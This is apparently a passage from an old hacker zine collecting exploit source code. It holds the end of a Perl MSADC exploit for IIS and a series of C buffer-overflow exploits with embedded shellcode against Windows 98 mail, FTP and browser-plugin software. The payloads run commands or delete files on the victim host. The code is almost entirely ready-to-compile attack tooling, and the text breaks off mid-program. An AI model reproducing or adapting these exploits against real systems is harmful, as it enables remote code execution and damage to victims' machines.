if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;} if($error=~/server has denied access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return if($results[$base]=~/Content-Type: application\/x-varg/); my @s=grep("^Server:",@results); if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" } else { print "/msadc/msadcs.dll was not found.\n";} exit;} ############################################################################## sub use_unc { $uncpath=$args{u}; $driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ print "Your UNC path sucks. You need the following format:\n". "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } if(create_table($driverline.$uncpath)){ if(run_query($driverline.$uncpath)){ print "Success!\n"; save ("dbq=".$uncpath); exit;}} } ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and # good friends!), wiretrip, l0pht, nmrc & all of phrack # # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... :) ############################################################################## @HWA 06.0 CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= CMAIL Server 2.3 SP2 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 626 #define JMPADR 622 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF, 0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } @HWA 07.0 FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= FuseMail Version 2.7 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 1159 #define RETADR 1074 #define FTP_PORT 110 #define JMP_ESP 0xbff7a027 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_ESP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } @HWA 08.0 NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= NetcPlus SmartServer3 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 1167 #define JMPADR 1163 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[2000]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } @HWA 09.0 FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= FTP Serv-U Version 2.5 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 9000 #define FTP_PORT 21 #define RETADR 164 #define CODEOFS 200 #define FSTACKOFS 174 #define JMPOFS 6 #define MAXUSER 100 #define MAXPASS 100 #define EIP 0xbff7a027 #define FAKESTACK 0x80050101 #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe"; void sendcmd(int sockfd,char *packetbuf) { int i; write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } } int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; char user[MAXUSER],pass[MAXPASS]; int sockfd,i,fakestack,ip,ebp,ins; if (argc<2){ printf("usage\n %s HostName {[username] [password]}\n",argv[0]); exit(1); }else if (argc==4){ strncpy(user,argv[2],MAXUSER-1); strncpy(pass,argv[3],MAXPASS-1); user[MAXUSER-1]=0; pass[MAXPASS-1]=0; }else{ strcpy(user,"anonymous"); strcpy(pass,"hoge@hohoho.com"); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,NOP,BUFSIZE); fakestack=FAKESTACK; for (i=0;i>8)&0xff; buf[i+2]=(fakestack>>16)&0xff; buf[i+3]=(fakestack>>24)&0xff; } ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[RETADR+4]=JMPS; buf[RETADR+5]=JMPOFS; memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"user %s\r\n",user); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"pass %s\r\n",pass); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"cwd %s\r\n",buf); sendcmd(sockfd,packetbuf); close(sockfd); } @HWA 10.0 Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= Tiny FTPD Version 0.51 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 1000 #define FTP_PORT 21 #define RETADR 137 #define JMPADR 133 #define CODEOFS 141 #define JMPOFS 6 #define JMP_EBX_ADR 0xbff7a06b unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_EBX_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; strncpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); memset(packetbuf,0,1024); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } @HWA 11.0 ZOM-MAIL 1.09 Exploit/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= ZOM-MAIL 1.09 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define TARGET_FILE "c:\\windows\\test.txt" #define MAXBUF 3000 #define RETADR 768 #define JMPESP_ADR 0xbffca4f7 #define STACK_BYTES 32 #define SMTP_PORT 25 #define CONTENT \ "Subject: [Warning!!] This is exploit test mail.\r\n"\ "MIME-Version: 1.0\r\n"\ "Content-Type: multipart/mixed; "\ "boundary=\"U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\"\r\n"\ "Content-Transfer-Encoding: 7bit\r\n"\ "--U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\r\n"\ "Content-Type: image/gif; name=\"%s.gif\"\r\n"\ "Content-Disposition: attachment;\r\n"\ " filename=\"temp.gif\"\r\n" unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.remove."; void send_smtpcmd(SOCKET sock,char *cmd) { char reply[MAXBUF]; int r; send(sock,cmd,strlen(cmd),0); r=recv(sock,reply,MAXBUF,0); reply[r]=0; printf("%-11s: %s\n",strtok(cmd,":"),reply); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int ip,p1,p2; char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<3){ printf("This exploit removes \"%s\" on the victim host",TARGET_FILE); printf("usage: %s SMTPserver Mailaddress\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)SMTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } recv(sock,packetbuf,MAXBUF,0); printf("BANNER : %s\n",packetbuf); send_smtpcmd(sock,"EHLO mail.attcker-host.net\r\n"); send_smtpcmd(sock,"MAIL FROM: \r\n"); sprintf(packetbuf,"RCPT TO: <%s>\r\n",argv[2]); send_smtpcmd(sock,packetbuf); send_smtpcmd(sock,"DATA\r\n"); memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; ip=JMPESP_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strcat(exploit_code,cmdbuf); strcat(exploit_code,TARGET_FILE); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; exploit_code[0x2a]=strlen(TARGET_FILE); memcpy(buf+RETADR+4+STACK_BYTES,exploit_code,strlen(exploit_code)); sprintf(packetbuf,CONTENT,buf); send(sock,packetbuf,strlen(packetbuf),0); send_smtpcmd(sock,".\r\n"); closesocket(sock); printf("Done.\n"); return FALSE; } @HWA 12.0 AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= AL-Mail32 Version 1.10 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #define HEADER1 \ "From hehehe@hohoho.com Sat Jul 32 25:01 JST 1999\n"\ "Message-ID: <001_The_ShadowPenguinSecurity_@rockhopper>\n" #define HEADER2 \ "Content-Transfer-Encoding: 7bit\n"\ "X-Mailer: PenguinMailer Ver1.01\n"\ "Content-Type: text/plain; charset=US-ASCII\n"\ "Content-Length: 6\n"\ "\n"\ "hehe\n" #define RETADR 260 #define JMPADR 256 #define JMPOFS 6 #define JMP_EBX_ADR 0xbff7a06b #define CMDLENP 0x43 #define BUFEND 5000 #define FUNC "msvcrt.dll.system.exit." #define JMPS 0xeb #define NOP 0x90 unsigned char exploit_code[200]={ 0xEB,0x4D,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23, 0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x04,0x88,0x23,0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF8,0x43, 0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,0xFF,0xD7,0xE8, 0xAE,0xFF,0xFF,0xFF,0x00 }; main(int argc,char *argv[]) { FILE *fp; static char buf[10000]; int i,r,ip; if (argc!=3){ printf("usage : %s MailSpoolDirectry WindowsCommand\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("Permittion denied :-P\n"); exit(1); } fwrite(HEADER1,1,strlen(HEADER1),fp); memset(buf,NOP,BUFEND); strcat(exploit_code,FUNC); strcat(exploit_code,argv[2]); exploit_code[CMDLENP]=strlen(argv[2]); strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); ip=JMP_EBX_ADR; buf[JMPADR] =0xeb; buf[JMPADR+1]=0x06; buf[RETADR+3]=0xff&(ip>>24); buf[RETADR+2]=0xff&(ip>>16); buf[RETADR+1]=0xff&(ip>>8); buf[RETADR] =ip&0xff; buf[BUFEND] =0; fprintf(fp,"Reply-To: \"%s\" \n",buf); fprintf(fp,"From: \"%s\" \n",buf); fwrite(HEADER2,1,strlen(HEADER2),fp); fclose(fp); } @HWA 13.0 YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #define MAXBUF 700 #define RETADR 256 unsigned int mems[]={ 0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000, 0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000, 0xbfee0000,0xbfee5000,0xbff20000,0xbff47000, 0xbff50000,0xbff61000,0xbff70000,0xbffc6000, 0xbffc9000,0xbffe3000,0,0}; unsigned char exploit_code[200]={ 0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80, 0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28, 0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03, 0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7, 0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00 }; unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE"; unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { FILE *fp; unsigned int i,ip; unsigned char buf[MAXBUF]; if (argc<2){ printf("usage %s output_htmlfile\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE; fprintf(fp,">8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strcat(exploit_code,cmdbuf); memcpy(buf,exploit_code,strlen(exploit_code)); buf[MAXBUF]=0; fprintf(fp,"%s\"\n>\n",buf); fclose(fp); printf("%s created.\n",argv[1]); return FALSE; } @HWA 14.0 Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= Skyfull Mail Server Version 1.1.4 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define MAXBUF 3000 #define RETADR 655 #define JMPADR 651 #define SMTP_PORT 25 #define JMPEAX_ADR 0xbfe0a035 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe"; main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int ip,p1,p2; static unsigned char 